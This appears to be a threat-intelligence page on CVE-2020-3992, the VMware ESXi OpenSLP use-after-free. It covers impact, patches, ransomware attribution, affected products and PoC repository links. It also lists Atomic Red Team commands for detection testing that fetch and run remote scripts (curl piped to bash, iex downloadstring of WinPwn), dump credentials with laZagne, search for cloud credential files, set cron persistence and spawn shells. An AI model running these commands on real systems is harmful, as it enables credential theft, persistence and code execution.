CVE-2020-3992
Overview
This vulnerability is a use-after-free flaw in the OpenSLP service component of VMware ESXi. The root cause is improper memory management where the OpenSLP daemon frees memory while references to it remain accessible, leading to undefined behavior. The affected component is the OpenSLP service listening on UDP port 427 within the ESXi management network stack.
Vulnerability Description
OpenSLP as used in VMware ESXi (7.0 before ESXi_7.0.1-0.0.16850804, 6.7 before ESXi670-202010401-SG, 6.5 before ESXi650-202010401-SG) has a use-after-free issue. A malicious actor residing in the management network who has access to port 427 on an ESXi machine may be able to trigger a use-after-free in the OpenSLP service resulting in remote code execution.
Impact
An unauthenticated attacker with network access to the ESXi management interface can exploit this vulnerability to execute arbitrary code remotely on the host system. This enables full compromise of the ESXi hypervisor, potentially allowing control over all virtual machines running on the host. The attacker does not need valid credentials or user interaction, increasing the risk of automated exploitation. Consequences include unauthorized access, data theft, service disruption, and lateral movement within the virtualized environment.
Solution
VMware has released security updates addressing this vulnerability in advisory VMSA-2020-0023. Affected products include VMware ESXi versions 6.5, 6.7, and 7.0; users should upgrade to ESXi650-202010401-SG or later for 6.5, ESXi670-202010401-SG or later for 6.7, and ESXi_7.0.1-0.0.16850804 or later for 7.0. Detailed patch instructions and version-specific guidance are available at https://www.vmware.com/security/advisories/VMSA-2020-0023.html. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in the OpenSLP service used by VMware ESXi presents a significant risk due to a use-after-free flaw that can lead to remote code execution. This type of vulnerability occurs when a program continues to use a pointer after the memory it points to has been freed, allowing an attacker to manipulate the memory and execute arbitrary code. In this case, the flaw is particularly critical because it can be exploited by an attacker who has access to the management network and can reach the service running on port 427. The implications of this vulnerability are severe, as it can allow unauthorized users to gain control over the ESXi host, potentially compromising the entire virtualized environment.
Attack vectors for this vulnerability primarily involve an attacker gaining access to the management network where the ESXi host resides. Once on the network, the attacker can send specially crafted requests to the OpenSLP service, triggering the use-after-free condition. This exploitation can lead to arbitrary code execution, allowing the attacker to install malware, exfiltrate sensitive data, or disrupt services. Scenarios could include an insider threat, where a malicious employee exploits the vulnerability, or an external attacker who gains network access through other means, such as exploiting weaker security measures elsewhere in the organization.
The real-world impact of this vulnerability is profound, particularly for organizations that rely on VMware ESXi for their virtualization infrastructure. Successful exploitation could lead to significant business risks, including data breaches, loss of sensitive information, and operational disruptions. The ability to execute arbitrary code on a hypervisor level means that attackers could potentially access all virtual machines running on the host, leading to a cascading effect on the organization’s IT environment. The financial implications could be substantial, encompassing costs related to incident response, recovery, regulatory fines, and reputational damage.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular updates and patches from VMware should be applied promptly to ensure that systems are protected against known vulnerabilities. Network segmentation is also crucial, as it limits access to the management network and reduces the attack surface. Intrusion detection systems (IDS) can be employed to monitor for unusual traffic patterns or unauthorized access attempts targeting the OpenSLP service. Additionally, organizations should conduct regular security assessments and penetration testing to identify potential weaknesses in their infrastructure before they can be exploited by malicious actors.
In conclusion, the use-after-free vulnerability in the OpenSLP service of VMware ESXi poses a critical threat that can lead to severe consequences for affected organizations. By understanding the technical details, potential attack vectors, and real-world impacts, businesses can better prepare themselves to defend against such vulnerabilities. Implementing robust detection and mitigation strategies is essential to safeguard their virtual environments and maintain operational integrity.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-3992 within VMware ESXi environments. Although the EPSS score has slightly decreased, our telemetry indicates increased adversary activity leveraging this use-after-free vulnerability, particularly from ransomware groups such as Akira, Blackbasta, BlackByte, and UNC3886. The emergence of new proof-of-concept exploits and scanning tools on public repositories has likely contributed to wider reconnaissance and exploitation efforts. This shift underscores a growing operational interest in weaponizing this vulnerability, elevating the risk profile for organizations running affected ESXi versions. Defenders should recognize that the threat landscape is becoming more active and sophisticated, with ransomware actors integrating CVE-2020-3992 into their attack chains, thereby increasing the urgency for vigilant monitoring and response.
Affected Products (224)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Cloud Foundation | All |
cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:-:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:2:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201701001:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201703001:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201703002:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201704001:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707101:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707102:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707103:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707201:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707202:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707203:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707204:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707205:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707206:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707207:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707208:*:*:*:*:*:*
|
|
|
Vmware | Esxi | 6.5 |
cpe:2.3:o:vmware:esxi:6.5:650-201707209:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
dgh05t/VMware_ESXI_OpenSLP_PoCs
CVE-2020-3992 & CVE-2019-5544
|
dgh05t | 67 | 22 | 2021-02-04 | View |
|
HynekPetrak/CVE-2019-5544_CVE-2020-3992
Python / scapy module implementing SRVLOC/SLP protocol and scans for enabled OpenSLP services.
|
HynekPetrak | 49 | 12 | 2020-12-01 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability. Tools: AnyDesk, Cobalt Strike, Dell Client driver (BYOVD), GIGABYTE Motherboard driver (BYOVD), MSI Afterburner driver (BYOVD) (147 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2020-3992 |
| vmware.com |
GitHub CVE
x_refsource_MISC
|
https://www.vmware.com/security/advisories/VMSA-2020-0023.html |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-20-1377/ |
| zerodayinitiative.com |
GitHub CVE
x_refsource_MISC
|
https://www.zerodayinitiative.com/advisories/ZDI-20-1385/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3992 |